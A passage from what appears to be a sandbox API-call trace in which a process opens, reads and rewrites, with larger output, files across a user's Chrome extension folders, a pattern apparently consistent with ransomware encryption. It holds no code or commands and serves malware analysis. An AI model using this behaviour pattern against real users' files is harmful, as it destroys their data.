data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0149.308] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.308] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x289 [0149.308] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.308] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.308] ReleaseMutex (hMutex=0x168) returned 1 [0149.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0149.308] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x289, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x2b1f2bc*=0x289, lpOverlapped=0x0) returned 1 [0149.343] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0149.343] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a7bc8*, nNumberOfBytesToWrite=0x811, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a7bc8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x811, lpOverlapped=0x0) returned 1 [0149.344] CloseHandle (hObject=0x1d4) returned 1 [0149.344] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0149.345] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.345] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x180f [0149.345] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.345] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.346] ReleaseMutex (hMutex=0x168) returned 1 [0149.346] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="128.png", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0149.346] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="128.png", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="128.png", lpUsedDefaultChar=0x0) returned 7 [0149.346] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x180f, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f2bc*=0x180f, lpOverlapped=0x0) returned 1 [0149.369] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0149.369] WriteFile (in: hFile=0x1d4, lpBuffer=0x25abcd8*, nNumberOfBytesToWrite=0x1d97, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25abcd8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1d97, lpOverlapped=0x0) returned 1 [0149.369] CloseHandle (hObject=0x1d4) returned 1 [0149.369] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0149.375] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.375] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x14c [0149.375] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.375] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.375] ReleaseMutex (hMutex=0x168) returned 1 [0149.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0149.376] ReadFile (in: hFile=0x1d4, lpBuffer=0x25e9498, nNumberOfBytesToRead=0x14c, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25e9498*, lpNumberOfBytesRead=0x2b1f2bc*=0x14c, lpOverlapped=0x0) returned 1 [0149.376] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0149.376] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x6d4, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x2b1f2d0*=0x6d4, lpOverlapped=0x0) returned 1 [0149.377] CloseHandle (hObject=0x1d4) returned 1 [0149.377] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0149.386] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.386] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe2 [0149.387] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.387] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.387] ReleaseMutex (hMutex=0x168) returned 1 [0149.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0149.387] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ee42e8, nNumberOfBytesToRead=0xe2, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee42e8*, lpNumberOfBytesRead=0x2b1f2bc*=0xe2, lpOverlapped=0x0) returned 1 [0149.388] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0149.388] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x66a, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2b1f2d0*=0x66a, lpOverlapped=0x0) returned 1 [0149.389] CloseHandle (hObject=0x1d4) returned 1 [0149.389] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0149.389] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.390] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xd2 [0149.390] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.390] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.390] ReleaseMutex (hMutex=0x168) returned 1 [0149.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0149.390] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ed5e38, nNumberOfBytesToRead=0xd2, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed5e38*, lpNumberOfBytesRead=0x2b1f2bc*=0xd2, lpOverlapped=0x0) returned 1 [0149.391] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0149.391] WriteFile (in: hFile=0x1d4, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x65a, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x65a, lpOverlapped=0x0) returned 1 [0149.392] CloseHandle (hObject=0x1d4) returned 1 [0149.392] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0149.393] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.393] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xea [0149.393] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.393] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.393] ReleaseMutex (hMutex=0x168) returned 1 [0149.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0149.393] ReadFile (in: hFile=0x1d4, lpBuffer=0x2696608, nNumberOfBytesToRead=0xea, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2696608*, lpNumberOfBytesRead=0x2b1f2bc*=0xea, lpOverlapped=0x0) returned 1 [0149.394] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0149.394] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x672, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2b1f2d0*=0x672, lpOverlapped=0x0) returned 1 [0149.395] CloseHandle (hObject=0x1d4) returned 1 [0149.395] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0149.395] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.396] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2686 [0149.396] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.396] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.396] ReleaseMutex (hMutex=0x168) returned 1 [0149.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verified_contents.json", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0149.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verified_contents.json", cchWideChar=22, lpMultiByteStr=0x1f88b2c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="verified_contents.json", lpUsedDefaultChar=0x0) returned 22 [0149.396] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0150.002] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1686 [0150.002] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0150.007] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1686 [0150.008] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0150.008] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0150.008] WriteFile (in: hFile=0x1d4, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0150.008] CloseHandle (hObject=0x1d4) returned 1 [0150.009] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0150.011] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0150.011] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x221da [0150.011] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0150.011] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0150.011] ReleaseMutex (hMutex=0x168) returned 1 [0150.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cast_app.js", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0150.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cast_app.js", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cast_app.js", lpUsedDefaultChar=0x0) returned 11 [0150.011] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0150.013] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x211da [0150.014] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0150.015] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x211da [0150.015] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0150.015] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0150.015] WriteFile (in: hFile=0x1d4, lpBuffer=0x28790b8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28790b8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0150.016] CloseHandle (hObject=0x1d4) returned 1 [0150.016] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0150.019] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0150.019] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x945 [0150.019] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0150.019] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0150.019] ReleaseMutex (hMutex=0x168) returned 1 [0150.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="view.js", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0150.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="view.js", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="view.js", lpUsedDefaultChar=0x0) returned 7 [0150.020] ReadFile (in: hFile=0x1d4, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0x945, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2b1f2bc*=0x945, lpOverlapped=0x0) returned 1 [0150.022] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0150.022] WriteFile (in: hFile=0x1d4, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0xecd, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xecd, lpOverlapped=0x0) returned 1 [0150.022] CloseHandle (hObject=0x1d4) returned 1 [0150.023] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0150.025] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: 